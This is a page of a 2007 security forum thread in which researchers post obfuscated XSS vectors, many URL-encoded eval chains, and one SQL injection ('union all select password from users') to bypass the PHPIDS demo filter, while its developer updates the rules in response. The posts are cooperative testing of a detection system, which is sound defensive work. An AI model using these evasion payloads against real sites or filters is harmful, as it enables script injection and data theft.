Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Whether this is about ha.ckers.org, sla.ckers.org or some other project you are interested in or want to talk about, throw it in here to get feedback. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Pages: Previous1234567891011...LastNext
Current Page: 6 of 31
Re: WebApp IDS
Posted by: Anonymous User
Date: September 07, 2007 04:04PM

Yep - thanks for pointing that out! *fixed*

Options: ReplyQuote
Re: WebApp IDS
Posted by: Gareth Heyes
Date: September 08, 2007 05:22AM

This one is really cool :)
s3=1==true&&':';s2=1==true&&'(1)';s1=1==true&&'javascript'+s3+'aler'+'t'+s2;URL=s1

Options: ReplyQuote
Re: PHPIDS (former thread name Webapp IDS)
Posted by: Reiners
Date: September 08, 2007 11:50AM

I just want to add that this injection still works:
http://demo.php-ids.org/?test=1%20union%20all%20select%20password%20from%20users
--> ?test=1 union all select password from users
(query: SELECT name FROM users WHERE id = $test)

I think queries are more complicated (more columns selected, quotes used) in practice and more complicated injections will get detected by php-ids but maybe you find a good way to block this without triggering false positives ;))

have a nice weekend

Options: ReplyQuote
Re: PHPIDS (former thread name Webapp IDS)
Posted by: Gareth Heyes
Date: September 08, 2007 01:41PM

Nice try with your filters mate but here is my personal favorite vector:-
x=(this);c=1==1&&':';s=''+/javascriptaaalerta(1)ahrefa/+'';j=s[1]+s[2]+s[3]+s[4]+s[5]+s[6]+s[7]+s[8]+s[9]
+s[10]+c+s[12]+s[14]+s[15]+s[16]+s[17]+s[19]+s[20]+s[21];h=s[23]+s[24]+s[25]+s[26];x[h]=j

Heheh



Edited 1 time(s). Last edit at 09/08/2007 01:52PM by Gareth Heyes.

Options: ReplyQuote
Re: PHPIDS (former thread name Webapp IDS)
Posted by: thornmaker
Date: September 08, 2007 11:48PM

This is similar to Gareth's, but turned into an eval. Also, it will probably only work with firefox 2.0.0.6 though there are ways around this.

http://demo.php-ids.org/?test=%62%3D%28%6E%61%76%69%67%61%74%6F%72%29%3B%63%3D%28%62%2E%75%73%65%72%41%67%65%6E%74%29%3B%64%3D%63%5B%36%31%5D%2B%63%5B%34%39%5D%2B%63%5B%36%5D%2B%63%5B%34%5D%3B%65%3D%27%27%2B%2F%61%62%63%64%65%66%67%68%69%6A%6B%6C%6D%6E%6F%70%71%72%73%74%75%76%77%78%79%7A%2E%28%31%29%2F%3B%66%3D%65%5B%31%32%5D%2B%65%5B%31%35%5D%2B%65%5B%33%5D%2B%65%5B%31%5D%2B%65%5B%32%30%5D%2B%65%5B%39%5D%2B%65%5B%31%35%5D%2B%65%5B%31%34%5D%2B%65%5B%32%37%5D%2B%65%5B%38%5D%2B%65%5B%31%5D%2B%65%5B%31%39%5D%2B%65%5B%38%5D%2B%65%5B%32%37%5D%2B%65%5B%31%39%5D%2B%65%5B%32%31%5D%2B%65%5B%32%5D%2B%65%5B%31%39%5D%2B%65%5B%32%30%5D%2B%65%5B%31%38%5D%2B%65%5B%39%5D%2B%65%5B%31%34%5D%2B%65%5B%37%5D%2B%65%5B%32%38%5D%2B%65%5B%32%39%5D%2B%65%5B%33%30%5D%3B%30%5B%27%27%2B%5B%64%5D%5D%28%30%5B%27%27%2B%28%64%29%5D%28%66%29%29%3B#alert%280%29

Options: ReplyQuote
Re: PHPIDS (former thread name Webapp IDS)
Posted by: thornmaker
Date: September 09, 2007 12:52AM

thinking more on my previous injection led me to come up with a more simple one...

http://demo.php-ids.org/?test=%61%3D%31%21%3D%31%3F%30%3A%27%65%76%61%27%3B%62%3D%31%21%3D%31%3F%30%3A%27%6C%27%3B%63%3D%61%2B%62%3B%64%3D%31%21%3D%31%3F%30%3A%27%6C%6F%63%61%74%69%6F%27%3B%65%3D%31%21%3D%31%3F%30%3A%27%6E%2E%68%61%73%27%3B%66%3D%31%21%3D%31%3F%30%3A%27%68%2E%73%75%62%73%74%72%69%6E%27%3B%67%3D%31%21%3D%31%3F%30%3A%27%67%28%31%29%27%3B%68%3D%64%2B%65%2B%66%2B%67%3B%30%5B%27%27%2B%28%63%29%5D%28%30%5B%27%27%2B%28%63%29%5D%28%68%29%29%3B#alert%280%29

Options: ReplyQuote
Re: PHPIDS (former thread name Webapp IDS)
Posted by: Gareth Heyes
Date: September 09, 2007 04:13AM

Hey thornmaker

Cool stuff :)

Options: ReplyQuote
Re: PHPIDS (former thread name Webapp IDS)
Posted by: Anonymous User
Date: September 09, 2007 05:55AM

Indeed - thx!

@Reiners: The problem with your SQL injection is that there are no special chars included - the PHPIDS doesn't monitor strings without special chars due to performance issues. I agree that an SQL injection like this might work under certain circumstances but it would be pretty unusual.

Greetings,
.mario

Options: ReplyQuote
Re: PHPIDS (former thread name Webapp IDS)
Posted by: Anonymous User
Date: September 09, 2007 07:52AM

@mario

Actually it's pretty dangerous because it will execute on a lot of systems, including msaccess and TSQL server since most developers do not quote integers since they are... yes integeres ^^

No really, I've seen this way too often. In other cases in can be used to obtain file system information. Just like:

1 union select * from ..\..\

I discovered you can traverse dirs on msaccess through ASP, really funny stuff. if I may say.

Options: ReplyQuote
Re: PHPIDS (former thread name Webapp IDS)
Posted by: Anonymous User
Date: September 09, 2007 12:58PM

Quote

I discovered you can traverse dirs on msaccess through ASP, really funny stuff. if I may say.

Eew.. sometimes i wonder if they even try to think before implementing such features. Nice find anyway!

But nevertheless the union all select password from users issue is still a problem. I guess I'll have to discuss with the team what to do about vectors w/o any special chars.

[edit]seems like the union select all syntax doesn't work on mysql (5+)[/edit]



Edited 1 time(s). Last edit at 09/09/2007 01:06PM by .mario.

Options: ReplyQuote
Re: PHPIDS (former thread name Webapp IDS)
Posted by: Gareth Heyes
Date: September 09, 2007 01:29PM

c4=1==1&&'(1)';c3=1==1&&'aler';c2=1==1&&':';
c1=1==1&&'javascript';a=c1+c2+c3+'t'+c4;(URL=a);

Options: ReplyQuote
Re: PHPIDS (former thread name Webapp IDS)
Posted by: Reiners
Date: September 09, 2007 02:35PM

.mario Wrote:
-------------------------------------------------------
> seems like the union select all syntax doesn't
> work on mysql (5+)

have you tried "union all select" or is it a typo? It works on mysql 4 ...

Options: ReplyQuote
Re: PHPIDS (former thread name Webapp IDS)
Posted by: thornmaker
Date: September 09, 2007 02:42PM

slight modification: http://demo.php-ids.org/?test=%61%3D%31%21%3D%31%3F%30%3A%27%65%76%27%3B%62%3D%31%21%3D%31%3F%30%3A%27%61%27%3B%63%3D%31%21%3D%31%3F%30%3A%27%6C%27%3B%64%3D%61%2B%62%2B%63%3B%65%3D%31%21%3D%31%3F%30%3A%27%6C%6F%63%61%74%69%6F%27%3B%66%3D%31%21%3D%31%3F%30%3A%27%6E%2E%68%27%3B%67%3D%31%21%3D%31%3F%30%3A%27%73%68%2E%73%75%62%73%74%72%69%6E%27%3B%68%3D%31%21%3D%31%3F%30%3A%27%67%28%31%29%27%3B%69%3D%65%2B%66%2B%62%2B%67%2B%68%3B%30%5B%27%27%2B%28%64%29%5D%28%30%5B%27%27%2B%28%64%29%5D%28%69%29%29%3B#alert%28/a_rose_by_any_other_name/%29

Options: ReplyQuote
Re: PHPIDS (former thread name Webapp IDS)
Posted by: thornmaker
Date: September 10, 2007 12:17AM

here's a new one. i wanted to find a way to get the "eval" string using regular expressions... the "exec" function did the trick.
http://demo.php-ids.org/?test=%64%3D%27%27%2B%2F%65%76%61%6C%7E%6C%6F%63%61%74%7E%69%6F%6E%2E%68%7E%61%73%68%2E%73%75%7E%62%73%74%72%69%6E%67%28%31%29%2F%3B%65%3D%2F%2E%28%78%3F%2E%2A%29%7E%28%78%3F%2E%2A%29%7E%28%78%3F%2E%2A%29%7E%28%78%3F%2E%2A%29%7E%28%78%3F%2E%2A%29%2E%2F%3B%66%3D%65%2E%65%78%65%63%28%64%29%3B%67%3D%66%5B%32%5D%3B%68%3D%66%5B%33%5D%3B%69%3D%66%5B%34%5D%3B%6A%3D%66%5B%35%5D%3B%6B%3D%67%2B%68%2B%69%2B%6A%3B%30%5B%27%27%2B%28%66%5B%31%5D%29%5D%28%30%5B%27%27%2B%28%66%5B%31%5D%29%5D%28%6B%29%29%3B#alert%280%29

[Edit:] these vectors appear to be firefox-only



Edited 1 time(s). Last edit at 09/10/2007 12:20AM by thornmaker.

Options: ReplyQuote
Re: PHPIDS (former thread name Webapp IDS)
Posted by: Gareth Heyes
Date: September 10, 2007 02:44AM

beautiful code :)

My reg exp string conversation is cool eh?

Options: ReplyQuote
Re: PHPIDS (former thread name Webapp IDS)
Posted by: Anonymous User
Date: September 10, 2007 06:41AM

Yep - it is. If I only had known earlier that you can regex objects act like strings when treated as an array ;)

Options: ReplyQuote
Re: PHPIDS (former thread name Webapp IDS)
Posted by: Gareth Heyes
Date: September 10, 2007 07:15AM

Actually I think Javascript allows strings to be accessed like arrays and the conversation happens with the + ''

So for example this shouldn't be possible and should throw a javascript error:-
s1=/abc/;alert(s1[0]);

Whereas this will work:-
s1=/abc/+'';alert(s1[0]);

That should help you write a better rule

Options: ReplyQuote
Re: PHPIDS (former thread name Webapp IDS)
Posted by: thornmaker
Date: September 10, 2007 08:39AM

gareth: I was just thinking the same thing... here's the injection: http://demo.php-ids.org/?test=%78%3D%27%27%2B%2F%61%62%63%64%65%66%67%68%69%6A%6B%6C%6D%6E%6F%70%71%72%73%74%75%76%77%78%79%7A%2E%28%31%29%2F%3B%65%3D%78%5B%35%5D%3B%76%3D%78%5B%32%32%5D%3B%61%3D%78%5B%31%5D%3B%6C%3D%78%5B%31%32%5D%3B%6F%3D%78%5B%31%35%5D%3B%63%3D%78%5B%33%5D%3B%74%3D%78%5B%32%30%5D%3B%69%3D%78%5B%39%5D%3B%6E%3D%78%5B%31%34%5D%3B%68%3D%78%5B%38%5D%3B%73%3D%78%5B%31%39%5D%3B%75%3D%78%5B%32%31%5D%3B%62%3D%78%5B%32%5D%3B%72%3D%78%5B%31%38%5D%3B%67%3D%78%5B%37%5D%3B%64%6F%74%3D%78%5B%32%37%5D%3B%75%6E%6F%3D%78%5B%32%39%5D%3B%6F%70%3D%78%5B%32%38%5D%3B%63%70%3D%78%5B%33%30%5D%3B%7A%3D%65%2B%76%2B%61%2B%6C%3B%79%3D%6C%2B%6F%2B%63%2B%61%2B%74%2B%69%2B%6F%2B%6E%2B%64%6F%74%2B%68%2B%61%2B%73%2B%68%2B%64%6F%74%2B%73%2B%75%2B%62%2B%73%2B%74%2B%72%2B%69%2B%6E%2B%67%2B%6F%70%2B%75%6E%6F%2B%63%70%3B%30%5B%27%27%2B%5B%7A%5D%5D%28%30%5B%27%27%2B%28%7A%29%5D%28%79%29%29%3B#alert%280%29

I do love the ''+/awef/ trick... brilliant. and the fact that strings are implicit arrays helps a lot too.

Options: ReplyQuote
Re: PHPIDS (former thread name Webapp IDS)
Posted by: Gareth Heyes
Date: September 10, 2007 08:59AM

Yeah I like your vectors :)

I doubt they will work for long though, I'm sure their reg exps will be updated soon and then the fun begins again :D

Options: ReplyQuote
Re: PHPIDS (former thread name Webapp IDS)
Posted by: thornmaker
Date: September 10, 2007 09:17AM

all of them have already been fixed, aside from the most recent one posted, which to be fair was posted but half an hour ago

Options: ReplyQuote
Re: PHPIDS (former thread name Webapp IDS)
Posted by: Gareth Heyes
Date: September 10, 2007 09:22AM

Wow that was fast :)

I'll look forward to coming up with something new

Options: ReplyQuote
Re: PHPIDS (former thread name Webapp IDS)
Posted by: Anonymous User
Date: September 10, 2007 04:38PM

Yep :) Keep 'em coming. I guess it should be way harder with the new rules. Anyway - the help you guys did and are doing is awesome and very much appreciated!!

@thornmaker: I would like to credit you on the contact page too - you have an url you want me to link?

Greetings,
.mario

Options: ReplyQuote
Re: PHPIDS (former thread name Webapp IDS)
Posted by: thornmaker
Date: September 10, 2007 09:12PM

you can link to my site at http://p42.us .
yes, it is getting harder... but still doable: http://demo.php-ids.org/?test=%61%3D%31%21%3D%31%3F%2F%78%2F%3A%27%65%76%61%27%3B%62%3D%31%21%3D%31%3F%2F%78%2F%3A%27%6C%27%3B%61%3D%61%2B%62%3B%65%3D%31%21%3D%31%3F%2F%78%2F%3A%27%68%27%3B%62%3D%31%21%3D%31%3F%2F%78%2F%3A%27%6C%6F%63%61%74%69%6F%27%3B%63%3D%31%21%3D%31%3F%2F%78%2F%3A%27%6E%27%3B%64%3D%31%21%3D%31%3F%2F%78%2F%3A%27%2E%68%61%73%27%3B%68%3D%31%21%3D%31%3F%2F%78%2F%3A%27%31%29%27%3B%67%3D%31%21%3D%31%3F%2F%78%2F%3A%27%72%69%6E%67%28%30%27%3B%66%3D%31%21%3D%31%3F%2F%78%2F%3A%27%2E%73%75%62%73%74%27%3B%62%3D%62%2B%63%2B%64%2B%65%2B%66%2B%67%2B%68%3B%42%3D%30%30%5B%27%27%2B%5B%61%5D%5D%28%62%29%3B%30%30%5B%27%27%2B%5B%61%5D%5D%28%42%29%3B#alert%28/blue_canary_in_the_outlet_by_the_light_switch__who_watches_over_you/%29 . :)



Edited 1 time(s). Last edit at 09/10/2007 09:16PM by thornmaker.

Options: ReplyQuote
Re: PHPIDS (former thread name Webapp IDS)
Posted by: Gareth Heyes
Date: September 11, 2007 05:06AM

_=alert,1,1,_(1);

Options: ReplyQuote
Re: PHPIDS (former thread name Webapp IDS)
Posted by: Anonymous User
Date: September 11, 2007 01:29PM

@thornmaker: done

@Gareth: That one gave me real headaches (and does still a little bit - man I hate JS *g*)

Options: ReplyQuote
Re: PHPIDS (former thread name Webapp IDS)
Posted by: thornmaker
Date: September 11, 2007 07:58PM

@gareth: impressive

Options: ReplyQuote
Re: PHPIDS (former thread name Webapp IDS)
Posted by: thornmaker
Date: September 12, 2007 02:41AM

http://demo.php-ids.org/?test=%28%7A%3D%53%74%72%69%6E%67%29%26%26%28%7A%3D%7A%28%29%20%29%3B%7B%61%3D%28%31%21%3D%31%29%3F%61%3A%27%65%76%61%27%2B%7A%7D%7B%61%2B%3D%28%31%21%3D%31%29%3F%61%3A%27%6C%27%2B%7A%7D%7B%62%3D%28%31%21%3D%31%29%3F%62%3A%27%6C%6F%63%61%74%69%6F%27%2B%7A%7D%7B%62%2B%3D%28%31%21%3D%31%29%3F%62%3A%27%6E%2E%68%61%73%27%2B%7A%7D%7B%62%2B%3D%28%31%21%3D%31%29%3F%62%3A%27%68%2E%73%75%62%73%74%27%2B%7A%7D%7B%62%2B%3D%28%31%21%3D%31%29%3F%62%3A%27%72%28%31%29%27%2B%7A%7D%7B%63%3D%28%31%21%3D%31%29%3F%63%3A%28%30%29%5B%61%5D%7D%7B%64%3D%63%28%62%29%7D%7B%63%28%64%29%7D#alert%28%27In%20all%20things%20it%20is%20a%20good%20idea%20to%20hang%20a%20question%20mark%20now%20and%20then%20on%20the%20things%20we%20have%20taken%20for%20granted.%20--%20Bertrand%20Russell%27%29

For the record... I had to come up with at least 11 'regular expression evasion tricks' to get this one injected. what a night...



Edited 2 time(s). Last edit at 09/12/2007 02:58AM by thornmaker.

Options: ReplyQuote
Re: PHPIDS (former thread name Webapp IDS)
Posted by: Gareth Heyes
Date: September 12, 2007 03:21AM

Nice! :)

Options: ReplyQuote
Re: PHPIDS (former thread name Webapp IDS)
Posted by: tx
Date: September 12, 2007 03:06PM

Gareth Heyes Wrote:
-------------------------------------------------------
> _=alert,1,1,_(1);


Wtf is going on here?

-tx @ lowtech-labs.org

Options: ReplyQuote
Re: PHPIDS (former thread name Webapp IDS)
Posted by: Anonymous User
Date: September 12, 2007 03:23PM

vector-geddon ;)

_=alert,1,//
1,_(1);

_=alert,
1,1;;;_(2);

_=alert,1/**/,1,_((3));

Options: ReplyQuote
Pages: Previous1234567891011...LastNext
Current Page: 6 of 31


Sorry, only registered users may post in this forum.